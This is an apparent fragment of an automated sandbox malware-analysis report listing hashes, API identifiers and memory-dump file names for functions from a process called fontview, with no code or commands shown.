                                                      • String ID: %.2X
                                                      • API String ID: 1529278910-213608013
                                                      • Opcode ID: 6d29badc7abd6babc7931a4f00e66ec026234c9abe38375157b2317c3f440c38
                                                      • Instruction ID: ab478701061cdb77f35751579b8944a13045e9843e2e555ae6caed241adfc7f2
                                                      • Opcode Fuzzy Hash: 6d29badc7abd6babc7931a4f00e66ec026234c9abe38375157b2317c3f440c38
                                                      • Instruction Fuzzy Hash: 9D012176D00159ABDB00DFD9C881AEFFBB8FF48255F50446EE956E7201D734AA448BE0
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateGuid__snprintf_fprintf
                                                      • String ID: create guid error
                                                      • API String ID: 2959897907-1010078425
                                                      • Opcode ID: 4cea7cf2b984337b4d7d4ffe6108a3fc19ca67f450e3d562278f7069529bb91a
                                                      • Instruction ID: 88e1e5261fbf5aae0ab1c042631421d14db4c6bfa5234099037d4dc45f47e2ec
                                                      • Opcode Fuzzy Hash: 4cea7cf2b984337b4d7d4ffe6108a3fc19ca67f450e3d562278f7069529bb91a
                                                      • Instruction Fuzzy Hash: 5BF0B4B2D082846FEF06D7B0DC86EDD3FB8DB11645F004116E900DF183EA64E689CB91